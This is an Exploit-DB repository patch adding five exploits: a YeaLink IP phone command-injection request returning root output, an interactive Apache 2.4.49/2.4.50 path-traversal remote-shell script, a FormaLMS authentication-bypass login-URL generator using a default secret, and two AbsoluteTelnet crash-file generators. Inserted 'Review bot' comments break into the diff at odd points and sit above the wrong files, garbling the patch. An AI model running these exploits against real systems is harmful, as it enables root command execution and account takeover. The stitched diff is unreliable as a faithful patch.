From 5310d503ac341baefb8993308dfcab09636abaa3 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 12 Nov 2021 05:02:08 +0000
Subject: [PATCH] DB: 2021-11-12
5 changes to exploits/shellcodes
AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC)
AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC)
YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)
Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)
FormaLMS 2.4.4 - Authentication Bypass
---
 exploits/hardware/webapps/50509.txt | 44 ++++++++++
 exploits/multiple/webapps/50512.py | 121 ++++++++++++++++++++++++++++
 exploits/multiple/webapps/50513.py | 51 ++++++++++++
 exploits/windows/dos/50510.py | 37 +++++++++
 exploits/windows/dos/50511.py | 36 +++++++++
 files_exploits.csv | 5 ++
 6 files changed, 294 insertions(+)
 create mode 100644 exploits/hardware/webapps/50509.txt
 create mode 100755 exploits/multiple/webapps/50512.py
 create mode 100755 exploits/multiple/webapps/50513.py
 create mode 100755 exploits/windows/dos/50510.py
 create mode 100755 exploits/windows/dos/50511.py
diff --git a/exploits/hardware/webapps/50509.txt b/exploits/hardware/webapps/50509.txt
new file mode 100644
index 000000000..ce3279ee6
--- /dev/null
+++ b/exploits/hardware/webapps/50509.txt
@@ -0,0 +1,44 @@
+# Exploit Title: YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)
+# Date: 11-10-2021
+# Exploit Author: tahaafarooq
+# Vendor Homepage: https://www.yealink.com/
+# Version: 53.84.0.15
+# Tested on: YeaLink IP Phone SIP-T19P (Hadrware VOIP Phone)
+
+Description:
+
+Using Diagnostic tool from the Networking Tab to perform a Ping or Traceroute , to perform OS command injection
+
+POC:
+
+POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.890925468511929 HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+Content-Length: 49
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Accept: */*
+Origin: http://xxx.xxx.xxx.xxx
+Referer: http://xxx.xxx.xxx.xxx/servlet?m=mod_data&p=network-diagnosis&q=load
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: JSESSIONID=9a83d24461329a130
+Connection: close
+
+cmd=; id;&token=1714636915c6acea98
+
+-------------------------------------------------
+
+HTTP/1.1 200 OK
+Content-Type: text/html
+Connection: close
+Date: Wed, 10 Nov 2021 14:20:23 GMT
+Server: embed httpd
+Content-Length: 82
+
+
+
+ uid=0(root) gid=0(root)
+
+
+
\ No newline at end of file
diff --git a/exploits/multiple/webapps/50512.py b/exploits/multiple/webapps/50512.py
new file mode 100755
index 000000000..3f6971971
--- /dev/null
+++ b/exploits/multiple/webapps/50512.py
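Review bot: The write-up carries no remediation information — no fixed firmware version, no vendor advisory reference, and no indication whether builds other than 53.84.0.15 are affected — so a reader responsible for these phones cannot tell what to upgrade to or whether the Diagnostic page can simply be restricted; the header block should gain a line such as `# Fixed in: <unknown / not stated>` or `# Vendor response: none at time of publication`, whichever is true. The `# Tested on:` line also misspells "Hadrware". The response excerpt shows `Content-Length: 82` but only one short body line, so the captured body appears truncated or stripped of markup; stating that explicitly would avoid the reader assuming the transcript is complete.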
@@ -0,0 +1,121 @@
+# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)
+# Date: 11/11/2021
+# Exploit Author: Valentin Lobstein
+# Vendor Homepage: https://apache.org/
+# Software Link: https://github.com/Balgogan/CVE-2021-41773
+# Version: Apache 2.4.49/2.4.50 (CGI enabled)
+# Tested on: Debian GNU/Linux
+# CVE : CVE-2021-41773 / CVE-2021-42013
+# Credits : Lucas Schnell
+
+
+#!/usr/bin/env python3
+#coding: utf-8
+
+import os
+import re
+import sys
+import time
+import requests
+from colorama import Fore,Style
+
+
+header = '''\033[1;91m
+
+ ▄▄▄ ██▓███ ▄▄▄ ▄████▄ ██░ ██ ▓█████ ██▀███ ▄████▄ ▓█████
+ ▒████▄ ▓██░ ██▒▒████▄ ▒██▀ ▀█ ▓██░ ██▒▓█ ▀ ▓██ ▒ ██▒▒██▀ ▀█ ▓█ ▀
+ ▒██ ▀█▄ ▓██░ ██▓▒▒██ ▀█▄ ▒▓█ ▄ ▒██▀▀██░▒███ ▓██ ░▄█ ▒▒▓█ ▄ ▒███
+ ░██▄▄▄▄██ ▒██▄█▓▒ ▒░██▄▄▄▄██ ▒▓▓▄ ▄██▒░▓█ ░██ ▒▓█ ▄ ▒██▀▀█▄ ▒▓▓▄ ▄██▒▒▓█ ▄
+ ▓█ ▓██▒▒██▒ ░ ░ ▓█ ▓██▒▒ ▓███▀ ░░▓█▒░██▓░▒████▒ ░██▓ ▒██▒▒ ▓███▀ ░░▒████▒
+ ▒▒ ▓▒█░▒▓▒░ ░ ░ ▒▒ ▓▒█░░ ░▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░ ░ ▒▓ ░▒▓░░ ░▒ ▒ ░░░ ▒░ ░
+ ▒ ▒▒ ░░▒ ░ ▒ ▒▒ ░ ░ ▒ ▒ ░▒░ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ░ ░ ░
+ ░ ▒ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ ░ ░
+''' + Style.RESET_ALL
+
+
+if len(sys.argv) < 2 :
+ print( 'Use: python3 file.py ip:port ' )
+ sys.exit()
+
+def end():
+ print("\t\033[1;91m[!] 
Bye bye !") + time.sleep(0.5) + sys.exit(1) + +def commands(url,command,session): + directory = mute_command(url,'pwd') + user = mute_command(url,'whoami') + hostname = mute_command(url,'hostname') + advise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\'t an interactive shell)') + command = input(f"{Fore.RED}╭─{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\n{Fore.RED}╰─{Fore.YELLOW}$ {Style.RESET_ALL}") + command = f"echo; {command};" + req = requests.Request('POST', url=url, data=command) + prepare = req.prepare() + prepare.url = url + response = session.send(prepare, timeout=5) + output = response.text + print(output) + if 'clear' in command: + os.system('/usr/bin/clear') + print(header) + if 'exit' in command: + end() + +def mute_command(url,command): + session = requests.Session() + req = requests.Request('POST', url=url, data=f"echo; {command}") + prepare = req.prepare() + prepare.url = url + response = session.send(prepare, timeout=5) + return response.text.strip() + + +def exploitRCE(payload): + s = requests.Session() + try: + host = sys.argv[1] + if 'http' not in host: + url = 'http://'+ host + payload + else: + url = host + payload + session = requests.Session() + command = "echo; id" + req = requests.Request('POST', url=url, data=command) + prepare = req.prepare() + prepare.url = url + response = session.send(prepare, timeout=5) + output = response.text + if "uid" in output: + choice = "Y" + print( Fore.GREEN + '\n[!] Target %s is vulnerable !!!' % host) + print("[!] Sortie:\n\n" + Fore.YELLOW + output ) + choice = input(Fore.CYAN + "[?] Do you want to exploit this RCE ? 
(Y/n) : ") + if choice.lower() in ['','y','yes']: + while True: + commands(url,command,session) + else: + end() + else : + print(Fore.RED + '\nTarget %s isn\'t vulnerable' % host) + except KeyboardInterrupt: + end() + +def main(): + try: + apache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash' + apache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash' + payloads = [apache2449_payload,apache2450_payload] + choice = len(payloads) + 1 + print(header) + print("\033[1;37m[0] Apache 2.4.49 RCE\n[1] Apache 2.4.50 RCE") + while choice >= len(payloads) and choice >= 0: + choice = int(input('[~] Choice : ')) + if choice < len(payloads): + exploitRCE(payloads[choice]) + except KeyboardInterrupt: + print("\n\033[1;91m[!] Bye bye !") + time.sleep(0.5) + sys.exit(1) + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/50513.py b/exploits/multiple/webapps/50513.py new file mode 100755 index 000000000..66fea3c3e --- /dev/null +++ b/exploits/multiple/webapps/50513.py 
@@ -0,0 +1,51 @@
+# Exploit Title: FormaLMS 2.4.4 - Authentication Bypass
+# Google Dork: inurl:index.php?r=adm/
+# Date: 2021-11-10
+# Exploit Author: Cristian 'void' Giustini @ Hacktive Security
+# Vendor Homepage: https://formalms.org
+# Software Link: https://formalms.org
+# Version: <= 2.4.4
+# Tested on: Linux
+# CVE : CVE-2021-43136
+
+# Info: An authentication bypass issue in FormaLMS <= 2.4.4 allows an attacker to bypass the authentication mechanism and obtain a valid access to the platform.
+
+# Analysis:
+https://blog.hacktivesecurity.com/index.php/2021/10/05/cve-2021-43136-formalms-the-evil-default-value-that-leads-to-authentication-bypass/
+
+# Nuclei template:
+https://gist.github.com/hacktivesec/d2160025d24c5689d1bc60173914e004#file-formalms-authbypass-yaml
+
+#!/usr/bin/env python
+
+"""
+
+The following exploit generates two URLs with empty and fixed value of the "secret". In order to achieve a successful exploitation the "Enable SSO with a third party software through a token" setting needs to be enabled
+
+"""
+
+import sys
+import time
+import hashlib
+
+secret = "8ca0f69afeacc7022d1e589221072d6bcf87e39c"
+
+ def help():
+
+ print(f"Usage: {sys.argv[0]} username target_url")
+
+ sys.exit()
+
+
+if len(sys.argv) < 3:
+
+ help()
+
+user, url = (sys.argv[1], sys.argv[2])
+t = str(int(time.time()) + 5000)
+token = hashlib.md5(f"{user},{t},{secret}".encode()).hexdigest().upper()
+final_url = f"{url}/index.php?login_user={user}&time={t}&token={token}"
+print(f"URL with default secret: {final_url}")
+token = hashlib.md5(f"{user},{t},".encode()).hexdigest().upper()
+final_url = f"{url}/index.php?login_user={user}&time={t}&token={token}"
+print(f"URL with empty secret: {final_url}")
\ No newline at end of file
diff --git a/exploits/windows/dos/50510.py b/exploits/windows/dos/50510.py
new file mode 100755
index 000000000..60cd08922
--- /dev/null
+++ b/exploits/windows/dos/50510.py
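Review bot: `def help():` appears to carry leading whitespace while every other module-level statement (`import sys`, `secret = …`, `if len(sys.argv) < 3:`) starts at column 0; if that indentation is in the committed file rather than an artifact of this view, Python stops with `IndentationError: unexpected indent` before anything runs, so the block should read `def help():` at column 0 with `print(...)` and `sys.exit()` indented once beneath it. `help` also shadows the builtin of that name; `usage` would be the conventional choice. The module docstring explains the precondition (the token-SSO setting must be enabled) but not the remediation; one sentence noting that deployments at or below 2.4.4 should replace the shipped default secret or disable that setting, and upgrade (the fixed release is not stated in the header), would make the file useful to the people who have to respond to it.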
@@ -0,0 +1,37 @@
+# Exploit Title: AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC)
+# Discovered by: Yehia Elghaly
+# Discovered Date: 2021-11-10
+# Vendor Homepage: https://www.celestialsoftware.net/
+# Software Link: https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe
+# Tested Version: 11.24
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64
+
+# Description: AbsoluteTelnet 11.24 - 'SHA1/SHA2/Username' and 'Error Report' Denial of Service (PoC)
+
+# Steps to reproduce:
+# 1. - Download and install AbsoluteTelnet
+# 2. - Run the python script and it will create exploit.txt file.
+# 3. - Open AbsoluteTelnet 11.24
+# 4. - "new connection file -> Connection -> SSH1 & SSH2"
+# 5. - Paste the characters of txt file to "Authentication -> Username"
+# 6. - press "ok" button
+# 7. - Crashed
+# 8. - Reopen AbsoluteTelnet 11.24
+# 9. - Copy the same characters to "Your Email Address (optional)"
+# 10.- Click "Send Error Report" button
+# 11.- Crashed
+
+
+#!/usr/bin/python
+
+exploit = 'A' * 1000
+
+try:
+ file = open("exploit.txt","w")
+ file.write(exploit)
+ file.close()
+
+ print("POC is created")
+except:
+ print("POC not created")
\ No newline at end of file
diff --git a/exploits/windows/dos/50511.py b/exploits/windows/dos/50511.py
new file mode 100755
index 000000000..c5c29e6e2
--- /dev/null
+++ b/exploits/windows/dos/50511.py
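Review bot: The bare `except:` around the file write catches everything, including `KeyboardInterrupt` and `SystemExit`, and reports only `POC not created` with no reason, while `file = open(...)` is left open if `write` raises before `close()`; 50511.py has the identical block. A context manager with a narrowed handler fixes both: `with open("exploit.txt", "w") as fh:` / `    fh.write(exploit)` and `except OSError as exc:` followed by printing the exception. `file` also shadows a Python 2 builtin, which matters given the `#!/usr/bin/python` shebang — and that shebang sits on line 26, after the comment header, where the loader never reads it, so it should move to line 1 or be dropped. The `# Description:` line names 'SHA1/SHA2/Username' and 'Error Report' fields while the title names only 'Username'; aligning the two would help anyone triaging which input fields are affected.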
@@ -0,0 +1,36 @@
+# Exploit Title: AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC)
+# Discovered by: Yehia Elghaly
+# Discovered Date: 2021-11-10
+# Vendor Homepage: https://www.celestialsoftware.net/
+# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe
+# Tested Version: 11.24
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64
+
+# Description: AbsoluteTelnet 11.24 - 'DialUp/Phone' & license name Denial of Service (PoC)
+
+# Steps to reproduce:
+# 1. - Download and install AbsoluteTelnet
+# 2. - Run the python script and it will create exploit.txt file.
+# 3. - Open AbsoluteTelnet 11.24
+# 4. - "new connection file -> DialUp Connection
+# 5. - Paste the characters of txt file to "DialUp -> phone"
+# 6. - press "ok" button
+# 7. - Crashed
+# 8. - Reopen AbsoluteTelnet 11.24
+# 9. - Copy the same characters to "license name"
+# 10.- Click "Send Error Report" button
+# 11.- Crashed
+
+#!/usr/bin/python
+
+exploit = 'A' * 1000
+
+try:
+ file = open("exploit.txt","w")
+ file.write(exploit)
+ file.close()
+
+ print("POC is created")
+except:
+ print("POC not created")
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 54c19dd63..b85795061 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6803,6 +6803,8 @@ id,file,description,date,author,type,platform,port
 50322,exploits/windows/dos/50322.py,"Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC)",1970-01-01,"Quadron Research Lab",dos,windows,
 50433,exploits/windows/dos/50433.py,"NIMax 5.3.1 - 'Remote VISA System' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows,
 50434,exploits/windows/dos/50434.py,"NIMax 5.3.1f0 - 'VISA Alias' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows,
+50510,exploits/windows/dos/50510.py,"AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
+50511,exploits/windows/dos/50511.py,"AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",1970-01-01,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",1970-01-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",1970-01-01,KuRaK,local,linux,
@@ -44606,3 +44608,6 @@ id,file,description,date,author,type,platform,port
 50505,exploits/php/webapps/50505.py,"FusionPBX 4.5.29 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,Luska,webapps,php,
 50506,exploits/php/webapps/50506.txt,"Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS)",1970-01-01,"Ragavender A G",webapps,php,
 50507,exploits/php/webapps/50507.txt,"Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)",1970-01-01,"İlhami Selamet",webapps,php,
+50509,exploits/hardware/webapps/50509.txt,"YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)",1970-01-01,tahaafarooq,webapps,hardware,
+50512,exploits/multiple/webapps/50512.py,"Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)",1970-01-01,"Valentin Lobstein",webapps,multiple,
+50513,exploits/multiple/webapps/50513.py,"FormaLMS 2.4.4 - Authentication Bypass",1970-01-01,"Cristian \'void\' Giustini",webapps,multiple,